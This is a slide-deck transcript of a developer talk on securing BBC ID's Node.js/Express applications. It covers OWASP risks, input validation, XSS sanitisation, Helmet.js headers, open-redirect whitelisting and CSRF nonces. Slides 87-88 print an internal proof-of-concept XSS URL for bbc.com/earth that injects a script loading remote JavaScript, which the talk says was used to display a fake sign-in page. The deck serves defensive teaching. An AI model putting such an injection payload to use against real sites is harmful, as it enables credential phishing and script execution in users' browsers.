Application security is often an afterthought for developers, as we concentrate on the next shiny new feature for our projects. In this talk, we’ll highlight the importance of application security and explore some simple and practical ways that we as developers can defend our services from intrusion. We’ll look at how my team at the BBC approached security concerns when creating the new BBC ID applications, and dive into some code examples to explore the best practices for Node.js server security. Talk originally given at JavaScript North West meetup. https://www.meetup.com/JavaScript-North-West/events/239152184/

1. WWW.MARCLITTLEMORE.COM
SECURING YOUR
BBC IDENTITY
MARC LITTLEMORE

2. MARC LITTLEMORE
PRINCIPAL SOFTWARE ENGINEER
NODE / JAVASCRIPT
“DIGITAL SECURITY CHAMPION”
19+ YEARS C/C++ VIDEOGAMES
NO SECURITY BACKGROUND

3. MARC LITTLEMORE
PRINCIPAL SOFTWARE ENGINEER
NODE / JAVASCRIPT
I USE
SEMICOLONS
#oldschoolcprogrammer

4. @marclittlemore
github.com/marcl
marc@marclittlemore.com
www.marclittlemore.com
MARC LITTLEMORE

5. WHAT’S THIS ALL ABOUT?
MOSTLY SECURE CODING

6. WHY DEVELOPERS SHOULD CARE
BBC ID ARCHITECTURE
BECOMING A “SECURITY EXPERT”
OWASP TOP 10
ENCRYPT TRAFFIC (VERY BRIEFLY)
WHAT’S THIS ALL ABOUT?

7. WHAT’S THIS ALL ABOUT?
INPUT VALIDATION
OUTPUT SANITISATION (XSS)
ID-NODE-SERVER
EXPRESS SECURITY MIDDLEWARE
CROSS SITE REQUEST FORGERY
// TODO : FUTURE WORK

8. WHY DEVELOPERS SHOULD
CARE ABOUT SECURITY

9. https://haveibeenpwned.com

10. http://uk.businessinsider.com/cheating-affair-website-ashley-madison-hacked-user-data-leaked-2015-7

11. http://www.theverge.com/2016/10/21/13362354/dyn-dns-ddos-attack-cause-outage-status-explained

12. https://snyk.io/blog/77-percent-of-sites-use-vulnerable-js-libraries/

13. ALL OF YOUR ACCOUNTS ARE ON
HAVEIBEENPWNED.COM
YOUR APPLICATIONS
MUST BE SO SECURE

14. WHY DOES IT MATTER?
I’M JUST A DEVELOPER

16. “YOU BETTER CHECK YO SELF
BEFORE YOU WRECK YO SELF”

17. LOSS OF PERSONAL DATA
EXPOSURE OF INTERNAL DATA
MALWARE
RANSOMWARE
DATA INTERCEPTION
DENIAL OF SERVICE

18. LULZ
I DID IT FOR THE

19. I DID IT FOR THE

20. $$$$$
£££££
€€€€€

21. “APPLICATION SECURITY IS
IMPORTANT YO!”*

22. “APPLICATION SECURITY IS
IMPORTANT YO!”*
* ICE CUBE DIDN’T SAY THIS BUT I’M SURE HE AGREES

23. BBC IDENTITY
APPLICATION ARCHITECTURE

24. JAVASCRIPT EVERYWHERE!
JAVASCRIPT...

25. JAVASCRIPT EVERYWHERE!
JAVASCRIPT...

26. JAVASCRIPT EVERYWHERE!
JAVASCRIPT...

28. PROFILE
BACKEND IDENTITY
APIS
ACCOUNT SESSION
ID FRONTEND
OTHER BBC APIS
HTTPS
(SSL/TLS)
NODE.JS
REACT
AWS
USERS
OPENAM
OPENIDM

29. OPENAM
SINGLE SIGN-ON
OAUTH 2.0 + OPEN ID CONNECT
USER CREDENTIALS
SESSION DATA + TOKENS
OAUTH CLIENTS FOR MOBILE

30. OPENIDM
ACCOUNT MANAGEMENT
ADDITIONAL DATA
SUPPORTING FUNCTIONS:
RECRYPTER
EMAIL SERVICES
V4 TO V5 UPDATE

31. OPENAM / OPENIDM
REST API
+ BBC SPECIFIC FUNCTIONS
NOT OUR TEAM’S APPLICATIONS

32. OPENAM / OPENIDM
REST API
+ BBC SPECIFIC FUNCTIONS
NOT OUR TEAM’S APPLICATIONS

33. ACCOUNT
NODE + EXPRESS SERVER
REACT UI
CORE AUTHENTICATION:
REGISTRATION (U13/U18/O18)
SIGN-IN
UPLIFT V4 TO V5
POLICY UPLIFT
ACCOUNT SESSION

35. SESSION
NODE + EXPRESS SERVER
API ONLY - NO UI
HIGH TRAFFIC
SESSION MANAGEMENT
TOKEN REFRESH
SESSIONACCOUNT

36. PROFILE
NODE + EXPRESS SERVER
REACT UI
SETTINGS / USER DATA
CHILD/PARENT LINKING
PASSWORD RESET
USES SESSION + ACCOUNT
PROFILE

38. HOW TO BECOME
A SECURITY EXPERT

39. HOW TO BECOME
A SECURITY EXPERT
A SECURE CODER

41. “SECURITY CHAMPION”

42. “SECURITY CHAMPION”
NOT SECURITY EXPERT

43. YOU DON’T HAVE TO BE
A SECURITY EXPERT

44. YOU JUST NEED TO
LEARN & GET STARTED

45. YOU JUST NEED TO
CARE ABOUT SECURITY

46. YOU JUST NEED TO
PROTECT YOUR CODE

47. YOU JUST NEED TO
PROTECT YOUR USERS

48. HOW I GOT STARTED
CONSULT THE EXPERTS

49. DINIS CRUZ
WEB APP SECURITY CONSULTANT
@DINISCRUZ
PETER DE ROOIJ
SECURITY SOLUTION ARCHITECT
LINKEDIN.COM/IN/PDEROOIJ

50. HOW I GOT STARTED
OWASP TOP 10

51. https://www.owasp.org

52. OWASP TOP 10 (2013)
A1 INJECTION
A2 BROKEN AUTHENTICATION / SESSION
MANAGEMENT
A3 CROSS SITE SCRIPTING (XSS)
A4 INSECURE DIRECT OBJECT REFERENCES
A5 SECURITY MISCONFIGURATION

53. OWASP TOP 10
A6 SENSITIVE DATA EXPOSURE
A7 MISSING FUNCTION LEVEL ACCESS
CONTROL
A8 CROSS SITE REQUEST FORGERY (CSRF)
A9 USING COMPONENTS WITH KNOWN
VULNERABILITIES
A10 UNVALIDATED REDIRECTS & FORWARDS

54. http://nodegoat.herokuapp.com/tutorial

55. ENCRYPT YOUR TRAFFIC
SAFE TRANSFER OF USER DATA

56. ENCRYPT YOUR DATA IN TRANSIT
USE SSL/TLS FOR YOUR SITES

57. EASY TO ENABLE HTTPS
FREE CERTIFICATES

58. https://letsencrypt.org/

59. INPUT VALIDATION
DON’T. TRUST. ANYONE.

60. https://xkcd.com/327/
EXPLOITS OF A MOM (XKCD #327)

62. VALIDATE
ALL THE THINGS

66. VALIDATE TOP 500 PASSWORDS

67. http://www.informationisbeautiful.net/visualizations/top-500-passwords-visualized/

68. http://www.informationisbeautiful.net/visualizations/top-500-passwords-visualized/
TOP 500 PASSWORDS VALIDATED?

69. http://www.informationisbeautiful.net/visualizations/top-500-passwords-visualized/
TOP 500 PASSWORDS VALIDATED?
NOPE. USE CLEVER VALIDATION!

70. http://www.informationisbeautiful.net/visualizations/top-500-passwords-visualized/
TOP 500 PASSWORDS VALIDATED?
WE ONLY CHECK 17!

71. VALIDATE ON CLIENT
AND ON SERVER

72. INPUT VALIDATION
WHITELIST VALIDATION > SIMPLE
VALIDATION
VALIDATE ALL USER INPUT
VALIDATE ON CLIENT AND SERVER
CLEAN & WHITELIST DATA BEFORE API CALLS
BEWARE OF DATA EXPOSURE THROUGH
ERROR MESSAGING...

73. AVOID DATA EXPOSURE
THROUGH ENUMERATION

74. AVOID DATA EXPOSURE
HACKERS WILL BRUTE FORCE THIS

75. AVOID DATA EXPOSURE (IF POSSIBLE)
UX vs SECURITY TRADE-OFF

76. OUTPUT SANITISATION
DON’T. TRUST. YOURSELF.

77. OUTPUT SANITISATION
SANITISE BEFORE RE-DISPLAY

78. HELLO
IS IT XSS YOU’RE LOOKING FOR?

79. CROSS SITE SCRIPTING (XSS)
INJECTION OF MALICIOUS SCRIPT INTO PAGE
DATA FROM AN UNTRUSTED SOURCE
DATA INCLUDED WITHOUT VALIDATION
STORED XSS
REFLECTED XSS

80. OUTPUT SANITISATION
A TRUE STORY...

81. http://www.bbc.com/earth/uk

85. ONLY A TRIVIAL XSS RIGHT?
DON’T WORRY...

87. URL
http://www.bbc.com/earth/'-void(a=document.crea
teElement('script'),a.src=decodeURIComponent('h
ttps:%2F%2Frepo.dev.bbc.co.uk%2Fplayout%2Fteam%
2Ft.js'),document.head.appendChild(a))-'
INTERNAL PROOF OF CONCEPT

88. URL => CODE:
a=document.createElement('script')
a.src=decodeURIComponent('https:%2F%2Frepo.dev.
bbc.co.uk%2Fplayout%2Fteam%2Ft.js')
document.head.appendChild(a))-'
INTERNAL PROOF OF CONCEPT

92. XSS NOW DISPLAYS SIGN-IN + HACK ON HTTP://WWW.BBC.COM/EARTH/

93. XSS MITIGATION IS HARD

94. SANITISE YOUR DATA
https://github.com/leizongmin/js-xss/
https://github.com/salesforce/secure-filters
https://github.com/yahoo/xss-filters
DON’T ROLL YOUR OWN!

95. http://jsxss.com/

97. XSS FILTER BEFORE RETURNING TO CLIENT

98. SANITISE IN CONTEXT
SANITISE AS JS FOR JS OUTPUT
SANITISE AS HTML FOR HTML OUTPUT
WHITELIST TAGS AND ATTRIBUTES
BE CAREFUL WITH QUERY PARAMETERS
PARSING IS HARD!

99. VALIDATE AND SANITISE
YOU NEED TO DO BOTH

100. SECURE EXPRESS APPLICATIONS
ID NODE SERVER

101. SECURE EXPRESS APPLICATIONS
BOOTSTRAP EXPRESS APPS

105. EXPRESS MIDDLEWARE
MAKES SERVER SECURITY EASIER

106. MIDDLEWARE #1
EXPRESS
SERVER
REQUEST
RESPONSE
MIDDLEWARE #2
MIDDLEWARE #N
...
ADD
SECURITY
MIDDLEWARE
TO ALL
APPLICABLE
ROUTES

108. STANDARD SIGNATURE
(REQUEST, RESPONSE, NEXT)

109. USE HELMET.JS
SET UP HTTP HEADERS

110. https://helmetjs.github.io/

112. X-Powered-By
EXPOSE IMPLEMENTATION
HACKER USES TO THEIR ADVANTAGE
JUST REMOVE IT
app.disable(‘x-powered-by’);

113. X-Powered-By
EXPOSE IMPLEMENTATION
HACKER USES TO THEIR ADVANTAGE
OR CHANGE IT!
app.use(helmet.hidePoweredBy{setTo: 'PHP 4.2.0'});

114. X-Content-Type-Options
PREVENT CLIENT FROM GUESSING MIME TYPE
SERVER CAN SEND WRONG “CONTENT-TYPE”
BROWSER WILL EXECUTE JAVASCRIPT
<img src=”http://bad.com/bad-html.jpg” />
app.use(helmet.noSniff());

115. X-Frame-Options
AVOID CLICKJACKING ATTACK
HIDE OUR PAGES IN BAD SITE
PREVENT PUTTING PAGE IN IFRAME
app.use(helmet.frameguard({action: 'deny'}));

116. X-XSS-Protection
PREVENT REFLECTED XSS ATTACK
*DOESN’T PROTECT YOU FROM ALL XSS*
USE ADDITIONAL XSS PROTECTION
app.use(helmet.xssFilter());

117. Content-Security-Policy
TELL GOOD JS FROM BAD JS
WHITELIST ALLOWED CONTENT SOURCE
JS / CSS / IMAGES / FONTS
HARD TO GET RIGHT FOR US
app.use(helmet.contentSecurityPolicy(
cspConfiguration
));

118. Content-Security-Policy
SHARED HEADER (LOADS OTHER RESOURCES)
NO OWNER OF ALL VALID SOURCES
DUAL DOMAIN (BBC.COM & BBC.CO.UK)
SOME “UNSAFE” EXTERNAL DEPENDENCIES
USE REPORT-URI DIRECTIVE FOR FAILURES

119. OUR CSP POLICY

120. OUR CSP POLICY

121. CUSTOM EXPRESS MIDDLEWARE
USEFUL ADDITIONS

122. FLASH / PDF CAN EMBED YOUR CONTENT
DON’T ALLOW EMBEDS
OWASP RECOMMENDATION
X-Permitted-Cross-Domain-Policies

123. VALIDATE YOUR REDIRECTS
CONTEXTUAL REDIRECT FOR BBC APPS
THESE COULD BE ABUSED
SEND TO MALICIOUS PAGE WITH BBC
STYLING
OPEN REDIRECTS

125. WHAT HAPPENS IF WE
RETURN TO NON-BBC PAGE
BUT IT LOOKS LIKE OUR SIGN-IN PAGE?

126. BAD TIMES
REMEMBER OUR XSS
ATTACK?

127. CHECK FOR “LOCATION” HEADER
WHITELIST URLS
REWRITE TO SAFE URL IF UNKNOWN
SECURED OPEN REDIRECTS

130. https://github.com/MarcL/secure-redirects

131. https://github.com/MarcL/secure-redirects
MY OPEN SOURCE PACKAGE
npm install secure-redirects

132. CROSS-SITE REQUEST FORGERY
AUTHENTICATION GOES BAD

133. USER IS AUTHENTICATED
CLICKS ON MALICIOUS LINK
REQUEST HAS SIDE EFFECTS / MUTATES STATE
BROWSER SENDS AUTHENTICATED COOKIES
USER COMPROMISED WITHOUT REALISING
WHAT IS CSRF?

134. SESSION
OBTAIN OAUTH AUTHORISATION
TRICKED INTO ACQUIRING ACCESS TOKEN
PROFILE
SUBMIT USER PROFILE CHANGES
ACCESS USER DATA
WHY CSRF MATTERS TO BBC ID

135. AUTHORISATION
GENERATE NONCE (RANDOM NUMBER USED ONCE)
PASS NONCE IN OAUTH STATE
SET COOKIE WITH NONCE VALUE
MITIGATE CSRF: SESSION

136. AFTER CALLBACK
RETRIEVE NONCE FROM STATE
RETRIEVE NONCE FROM COOKIE
IF EQUAL THEN ALL IS GOOD
TAMPERED REQUEST IF NOT
REMOVE NONCE COOKIE IN BOTH CASES
MITIGATE CSRF: SESSION

137. GET PROFILE
GENERATE NONCE
ADD NONCE AS HIDDEN FIELD
SET COOKIE WITH NONCE VALUE
MITIGATE CSRF: PROFILE

138. POST PROFILE
RETRIEVE NONCE FROM HIDDEN FIELD
RETRIEVE NONCE FROM COOKIE
IF EQUAL THEN ALL IS GOOD
TAMPERED REQUEST IF NOT
REMOVE NONCE COOKIE IN BOTH CASES
MITIGATE CSRF: SESSION

139. https://github.com/expressjs/csurf

140. ADDITIONAL SECURITY
WHAT I HAVEN’T TALKED ABOUT

141. HTTP CLIENT FOR ALL API REQUESTS
ACCOUNT LOCKING
SECURE CONFIGURATION
HTTPONLY COOKIE FLAGS
LIMIT REQUEST BODY SIZES
LOCK DEPENDENT PACKAGES
ADDITIONAL SECURITY

142. // TODO:
FUTURE WORK

143. // TODO: FUTURE WORK
WHITELIST REDIRECTS
REQUEST PARAMETER POLLUTION
REGULAR EXPRESSION DOS
HTTP STRICT TRANSPORT SECURITY (HSTS)
TIMING ATTACKS

144. // TODO: FUTURE WORK
ADD SNYK / NSP INTO BUILD PIPELINE
SECURITY TEST SUITE
LOG CHECKING TEST SUITE
MAP ATTACK SURFACES
STRICT SECURITY CODE REVIEWS

145. TL;DR
SECURITY OVERLOAD

146. TL;DR
HTTPS ALL THE THINGS
VALIDATE ALL OF YOUR INPUTS
SANITISE ALL OF YOUR OUTPUTS
XSS - ENCODE FOR CONTEXT
PREVENT INTERNAL DISCLOSURE

147. TL;DR
EXPRESS + HELMET.JS == “EASY WIN”
CUSTOM MIDDLEWARE IF NEEDED
ALWAYS SECURE YOUR REDIRECTS
ADD CSRF TOKENS

148. TL;DR
CHECK YOUR DEPENDENCIES
STAY UP TO DATE
KEEP LEARNING

149. TL;DR
YOU’RE NEVER
TOTALLY SECURE

150. AND REMEMBER

151. “SECURITY IS A MISSION

152. “SECURITY IS A MISSION
...NOT AN INTERMISSION”
PAUL BLART, MALL COP 2

153. @marclittlemore
github.com/marcl
marc@marclittlemore.com
www.marclittlemore.com
THANKS! QUESTIONS?

154. IMAGE CREDITS
Digital background image / Designed by Freepik
Email icon / Chanut is Industries licensed under CC 3.0 BY
Other Icons / Bogdan Rosu licensed under CC 3.0 BY
All other images / CC0 / Unsplash or Pexels